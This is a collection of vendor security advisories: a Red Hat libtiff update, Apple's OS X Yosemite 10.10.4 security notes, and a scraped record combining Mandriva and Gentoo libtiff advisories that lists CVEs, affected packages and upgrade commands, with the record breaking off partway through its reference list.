Synopsis: Important: libtiff security update Advisory ID: RHSA-2016:1547-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1547.html Issue date: 2016-08-02 CVE Names: CVE-2014-8127 CVE-2014-8129 CVE-2014-8130 CVE-2014-9330 CVE-2014-9655 CVE-2015-1547 CVE-2015-7554 CVE-2015-8665 CVE-2015-8668 CVE-2015-8683 CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 CVE-2015-8784 CVE-2016-3632 CVE-2016-3945 CVE-2016-3990 CVE-2016-3991 CVE-2016-5320 =====================================================================
- Summary:
An update for libtiff is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files. By tricking a user into processing a specially crafted file, a remote attacker could exploit these flaws to cause a crash or memory corruption and, possibly, execute arbitrary code with the privileges of the user running the libtiff tool. (CVE-2014-8127, CVE-2014-8129, CVE-2014-8130, CVE-2014-9330, CVE-2015-7554, CVE-2015-8668, CVE-2016-3632, CVE-2016-3945, CVE-2016-3991)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
All running applications linked against libtiff must be restarted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1177893 - CVE-2014-9330 libtiff: Out-of-bounds reads followed by a crash in bmp2tiff 1185805 - CVE-2014-8127 libtiff: out-of-bounds read with malformed TIFF image in multiple tools 1185815 - CVE-2014-8129 libtiff: out-of-bounds read/write with malformed TIFF image in tiff2pdf 1185817 - CVE-2014-8130 libtiff: divide by zero in the tiffdither tool 1190703 - CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode 1190709 - CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode 1294417 - CVE-2015-7554 libtiff: Invalid-write in _TIFFVGetField() when parsing some extension tags 1294425 - CVE-2015-8668 libtiff: OOB read in bmp2tiff 1294427 - CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files 1294444 - CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c 1301649 - CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion 1301652 - CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode() 1325093 - CVE-2016-3945 libtiff: out-of-bounds write in the tiff2rgba tool 1325095 - CVE-2016-3632 libtiff: out-of-bounds write in _TIFFVGetField function 1326246 - CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8() 1326249 - CVE-2016-3991 libtiff: out-of-bounds write in loadImage() function 1346687 - CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: libtiff-3.9.4-18.el6_8.src.rpm
i386: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm
x86_64: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-3.9.4-18.el6_8.x86_64.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm libtiff-static-3.9.4-18.el6_8.i686.rpm
x86_64: libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.x86_64.rpm libtiff-static-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: libtiff-3.9.4-18.el6_8.src.rpm
x86_64: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-3.9.4-18.el6_8.x86_64.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.x86_64.rpm libtiff-static-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: libtiff-3.9.4-18.el6_8.src.rpm
i386: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm
ppc64: libtiff-3.9.4-18.el6_8.ppc.rpm libtiff-3.9.4-18.el6_8.ppc64.rpm libtiff-debuginfo-3.9.4-18.el6_8.ppc.rpm libtiff-debuginfo-3.9.4-18.el6_8.ppc64.rpm libtiff-devel-3.9.4-18.el6_8.ppc.rpm libtiff-devel-3.9.4-18.el6_8.ppc64.rpm
s390x: libtiff-3.9.4-18.el6_8.s390.rpm libtiff-3.9.4-18.el6_8.s390x.rpm libtiff-debuginfo-3.9.4-18.el6_8.s390.rpm libtiff-debuginfo-3.9.4-18.el6_8.s390x.rpm libtiff-devel-3.9.4-18.el6_8.s390.rpm libtiff-devel-3.9.4-18.el6_8.s390x.rpm
x86_64: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-3.9.4-18.el6_8.x86_64.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-static-3.9.4-18.el6_8.i686.rpm
ppc64: libtiff-debuginfo-3.9.4-18.el6_8.ppc64.rpm libtiff-static-3.9.4-18.el6_8.ppc64.rpm
s390x: libtiff-debuginfo-3.9.4-18.el6_8.s390x.rpm libtiff-static-3.9.4-18.el6_8.s390x.rpm
x86_64: libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-static-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: libtiff-3.9.4-18.el6_8.src.rpm
i386: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm
x86_64: libtiff-3.9.4-18.el6_8.i686.rpm libtiff-3.9.4-18.el6_8.x86_64.rpm libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-devel-3.9.4-18.el6_8.i686.rpm libtiff-devel-3.9.4-18.el6_8.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: libtiff-debuginfo-3.9.4-18.el6_8.i686.rpm libtiff-static-3.9.4-18.el6_8.i686.rpm
x86_64: libtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm libtiff-static-3.9.4-18.el6_8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8127 https://access.redhat.com/security/cve/CVE-2014-8129 https://access.redhat.com/security/cve/CVE-2014-8130 https://access.redhat.com/security/cve/CVE-2014-9330 https://access.redhat.com/security/cve/CVE-2014-9655 https://access.redhat.com/security/cve/CVE-2015-1547 https://access.redhat.com/security/cve/CVE-2015-7554 https://access.redhat.com/security/cve/CVE-2015-8665 https://access.redhat.com/security/cve/CVE-2015-8668 https://access.redhat.com/security/cve/CVE-2015-8683 https://access.redhat.com/security/cve/CVE-2015-8781 https://access.redhat.com/security/cve/CVE-2015-8782 https://access.redhat.com/security/cve/CVE-2015-8783 https://access.redhat.com/security/cve/CVE-2015-8784 https://access.redhat.com/security/cve/CVE-2016-3632 https://access.redhat.com/security/cve/CVE-2016-3945 https://access.redhat.com/security/cve/CVE-2016-3990 https://access.redhat.com/security/cve/CVE-2016-3991 https://access.redhat.com/security/cve/CVE-2016-5320 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following:
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A process may gain admin privileges without proper authentication Description: An issue existed when checking XPC entitlements. This issue was addressed through improved entitlement checking. CVE-ID CVE-2015-3671 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A non-admin user may obtain admin rights Description: An issue existed in the handling of user authentication. This issue was addressed through improved error checking. CVE-ID CVE-2015-3672 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may abuse Directory Utility to gain root privileges Description: Directory Utility was able to be moved and modified to achieve code execution within an entitled process. This issue was addressed by limiting the disk location that writeconfig clients may be executed from. CVE-ID CVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec
afpserver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the AFP server. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3674 : Dean Jerkovich of NCC Group
apache Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may be able to access directories that are protected with HTTP authentication without knowing the correct credentials Description: The default Apache configuration did not include mod_hfs_apple. If Apache was manually enabled and the configuration was not changed, some files that should not be accessible might have been accessible using a specially crafted URL. This issue was addressed by enabling mod_hfs_apple. CVE-ID CVE-2015-3675 : Apple
apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities exist in PHP, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.24 and 5.4.40. These were addressed by updating PHP to versions 5.5.24 and 5.4.40. CVE-ID CVE-2015-0235 CVE-2015-0273
AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3676 : Chen Liang of KEEN Team
AppleFSCompression Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in LZVN compression that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3677 : an anonymous researcher working with HP's Zero Day Initiative
AppleThunderboltEDMService Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the handling of certain Thunderbolt commands from local processes. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3678 : Apple
ATS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in handling of certain fonts. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3679 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3680 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3682 : Nuode Wei
Bluetooth Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze Networks
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may be able to intercept network traffic Description: An intermediate certificate was incorrectly issued by the certificate authority CNNIC. This issue was addressed through the addition of a mechanism to trust only a subset of certificates issued prior to the mis-issuance of the intermediate. Further details are available at https://support.apple.com/en-us/HT204938
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPAuthentication Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Following a maliciously crafted URL may lead to arbitrary code execution Description: A memory corruption issue existed in handling of certain URL credentials. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3684 : Apple
CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted text file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the processing of text files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1157 CVE-2015-3685 : Apple CVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3689 : Apple
coreTLS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: coreTLS accepted short ephemeral Diffie-Hellman (DH) keys, as used in export-strength ephemeral DH cipher suites. This issue, also known as Logjam, allowed an attacker with a privileged network position to downgrade security to 512-bit DH if the server supported an export-strength ephemeral DH cipher suite. The issue was addressed by increasing the default minimum size allowed for DH ephemeral keys to 768 bits. CVE-ID CVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck
DiskImages Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management. CVE-ID CVE-2015-3690 : Peter Rutenbar working with HP's Zero Day Initiative
Display Drivers Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An issue existed in the Monitor Control Command Set kernel extension by which a userland process could control the value of a function pointer within the kernel. The issue was addressed by removing the affected interface. CVE-ID CVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze Networks
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application with root privileges may be able to modify EFI flash memory Description: An insufficient locking issue existed with EFI flash when resuming from sleep states. This issue was addressed through improved locking. CVE-ID CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of LegbaCore LLC, Pedro Vilaca
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may induce memory corruption to escalate privileges Description: A disturbance error, also known as Rowhammer, exists with some DDR3 RAM that could have led to memory corruption. This issue was mitigated by increasing memory refresh rates. CVE-ID CVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working from original research by Yoongu Kim et al (2014)
FontParser Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team
Graphics Driver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out of bounds write issue existed in NVIDIA graphics driver. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3712 : Ian Beer of Google Project Zero
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple buffer overflow issues exist in the Intel graphics driver, the most serious of which may lead to arbitrary code execution with system privileges Description: Multiple buffer overflow issues existed in the Intel graphics driver. These were addressed through additional bounds checks. CVE-ID CVE-2015-3695 : Ian Beer of Google Project Zero CVE-2015-3696 : Ian Beer of Google Project Zero CVE-2015-3697 : Ian Beer of Google Project Zero CVE-2015-3698 : Ian Beer of Google Project Zero CVE-2015-3699 : Ian Beer of Google Project Zero CVE-2015-3700 : Ian Beer of Google Project Zero CVE-2015-3701 : Ian Beer of Google Project Zero CVE-2015-3702 : KEEN Team
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities existed in libtiff, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libtiff versions prior to 4.0.4. They were addressed by updating libtiff to version 4.0.4. CVE-ID CVE-2014-8127 CVE-2014-8128 CVE-2014-8129 CVE-2014-8130
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3703 : Apple
Install Framework Legacy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Several issues existed in how Install.framework's 'runner' setuid binary dropped privileges. This was addressed by properly dropping privileges. CVE-ID CVE-2015-3704 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOAcceleratorFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3705 : KEEN Team CVE-2015-3706 : KEEN Team
IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple null pointer dereference issues existed in the FireWire driver. These issues were addressed through improved error checking. CVE-ID CVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze Networks
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of APIs related to kernel extensions which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3720 : Stefan Esser
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of HFS parameters which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3721 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to overwrite arbitrary files Description: kextd followed symbolic links while creating a new file. This issue was addressed through improved handling of symbolic links. CVE-ID CVE-2015-3708 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A local user may be able to load unsigned kernel extensions Description: A time-of-check time-of-use (TOCTOU) race condition condition existed while validating the paths of kernel extensions. This issue was addressed through improved checks to validate the path of the kernel extensions. CVE-ID CVE-2015-3709 : Ian Beer of Google Project Zero
Mail Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A maliciously crafted email can replace the message content with an arbitrary webpage when the message is viewed Description: An issue existed in the support for HTML email which allowed message content to be refreshed with an arbitrary webpage. The issue was addressed through restricted support for HTML content. CVE-ID CVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek
ntfs Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in NTFS that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3711 : Peter Rutenbar working with HP's Zero Day Initiative
ntp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker in a privileged position may be able to perform a denial of service attack against two ntp clients Description: Multiple issues existed in the authentication of ntp packets being received by configured end-points. These issues were addressed through improved connection state management. CVE-ID CVE-2015-1798 CVE-2015-1799
OpenSSL Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Multiple issues exist in OpenSSL, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers Description: Multiple issues existed in OpenSSL 0.9.8zd which were addressed by updating OpenSSL to version 0.9.8zf. CVE-ID CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0293
QuickTime Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3661 : G. Geshev working with HP's Zero Day Initiative CVE-2015-3662 : kdot working with HP's Zero Day Initiative CVE-2015-3663 : kdot working with HP's Zero Day Initiative CVE-2015-3666 : Steven Seeley of Source Incite working with HP's Zero Day Initiative CVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs, Ryan Pentney, and Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3668 : Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3713 : Apple
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework code for parsing S/MIME e-mail and some other signed or encrypted objects. This issue was addressed through improved validity checking. CVE-ID CVE-2013-1741
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Tampered applications may not be prevented from launching Description: Apps using custom resource rules may have been susceptible to tampering that would not have invalidated the signature. This issue was addressed with improved resource validation. CVE-ID CVE-2015-3714 : Joshua Pitts of Leviathan Security Group
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to bypass code signing checks Description: An issue existed where code signing did not verify libraries loaded outside the application bundle. This issue was addressed with improved bundle verification. CVE-ID CVE-2015-3715 : Patrick Wardle of Synack
Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Searching for a malicious file with Spotlight may lead to command injection Description: A command injection vulnerability existed in the handling of filenames of photos added to the local photo library. This issue was addressed through improved input validation. CVE-ID CVE-2015-3716 : Apple
SQLite Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in SQLite's printf implementation. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3717 : Peter Rutenbar working with HP's Zero Day Initiative
System Stats Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious app may be able to compromise systemstatsd Description: A type confusion issue existed in systemstatsd's handling of interprocess communication. By sending a maliciously formatted message to systemstatsd, it may have been possible to execute arbitrary code as the systemstatsd process. The issue was addressed through additional type checking. CVE-ID CVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze Networks
TrueTypeScaler Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team
zip Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Extracting a maliciously crafted zip file using the unzip tool may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of zip files. These issues were addressed through improved memory handling. CVE-ID
CVE-2014-8139 CVE-2014-8140 CVE-2014-8141
OS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. https://support.apple.com/en-us/HT204950
OS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
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Show details on source website{
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"_id": null,
"data": "LibTIFF 4.0.3 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted TIFF image, as demonstrated by failure of tif_next.c to verify that the BitsPerSample value is 2, and the t2p_sample_lab_signed_to_unsigned function in tiff2pdf.c. LibTIFF Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LibTIFF is prone to multiple denial-of-service vulnerabilities. \nAn attacker can exploit these issues to cause the application to crash, denying service to legitimate users. A denial of service vulnerability exists in Silicon Graphics LibTiff version 4.0.3. \n\n Update:\n\n Packages for Mandriva Business Server 1 are now being provided. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8128\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8129\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8130\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547\n http://advisories.mageia.org/MGASA-2015-0112.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n f8727a71ac4ec2d7d4f1b633d6953822 mbs1/x86_64/lib64tiff5-4.0.4-0.1.mbs1.x86_64.rpm\n 32cdb5ebbe9aa26837e492bbc226f6eb mbs1/x86_64/lib64tiff-devel-4.0.4-0.1.mbs1.x86_64.rpm\n 917c2cf43c35469c768e62f9b670efd0 mbs1/x86_64/lib64tiff-static-devel-4.0.4-0.1.mbs1.x86_64.rpm\n 36ff180f975358b530230a3c0bf6ee64 mbs1/x86_64/libtiff-progs-4.0.4-0.1.mbs1.x86_64.rpm \n abad0883b65d252bd62ca2ea163a0754 mbs1/SRPMS/libtiff-4.0.4-0.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. It is called by numerous programs, including GNOME\nand KDE applications, to interpret TIFF images. Please review\nthe CVE identifier and bug reports referenced for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libTIFF users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/tiff-4.0.7\"\n\nReferences\n==========\n\n[ 1 ] CVE-2013-4243\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4243\n[ 2 ] CVE-2014-8127\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8127\n[ 3 ] CVE-2014-8128\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8128\n[ 4 ] CVE-2014-8129\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8129\n[ 5 ] CVE-2014-8130\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8130\n[ 6 ] CVE-2014-9330\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9330\n[ 7 ] CVE-2014-9655\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9655\n[ 8 ] CVE-2015-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1547\n[ 9 ] CVE-2015-7313\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7313\n[ 10 ] CVE-2015-7554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7554\n[ 11 ] CVE-2015-8665\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8665\n[ 12 ] CVE-2015-8668\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8668\n[ 13 ] CVE-2015-8683\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8683\n[ 14 ] CVE-2015-8781\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8781\n[ 15 ] CVE-2015-8782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8782\n[ 16 ] CVE-2015-8783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8783\n[ 17 ] CVE-2015-8784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8784\n[ 18 ] CVE-2016-3186\n 